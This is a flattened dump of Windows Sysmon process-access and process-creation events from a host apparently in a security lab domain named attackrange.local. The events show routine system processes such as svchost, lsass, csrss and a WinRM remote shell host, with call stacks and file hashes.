08:41:58.073{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002662Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.073{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002661Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.073{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002660Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.073{5D479F2C-16A1-5F84-1400-000000007F01}13081548C:\Windows\system32\svchost.exe{5D479F2C-16D6-5F84-7B00-000000007F01}4928C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002659Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.073{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16D6-5F84-7B00-000000007F01}4928C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002658Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.058{5D479F2C-16D6-5F84-7C00-000000007F01}49404960C:\Windows\system32\conhost.exe{5D479F2C-16D6-5F84-7B00-000000007F01}4928C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002657Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.058{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16D6-5F84-7C00-000000007F01}4940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002656Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.042{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002655Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.042{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002654Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.042{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002653Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.042{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002652Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.042{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002651Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.042{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002650Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.042{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002649Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.042{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002648Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.042{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002647Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.042{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16D6-5F84-7B00-000000007F01}4928C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002646Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.042{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16D6-5F84-7B00-000000007F01}4928C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002645Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.053{5D479F2C-16D6-5F84-7B00-000000007F01}4928C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{5D479F2C-16D6-5F84-ACD0-040000000000}0x4d0ac0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{5D479F2C-16A1-5F84-0C00-000000007F01}612C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002644Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.042{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002643Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.042{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002642Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.042{5D479F2C-169F-5F84-0B00-000000007F01}8644084C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002641Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.027{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002640Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.027{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002639Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.027{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002807Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 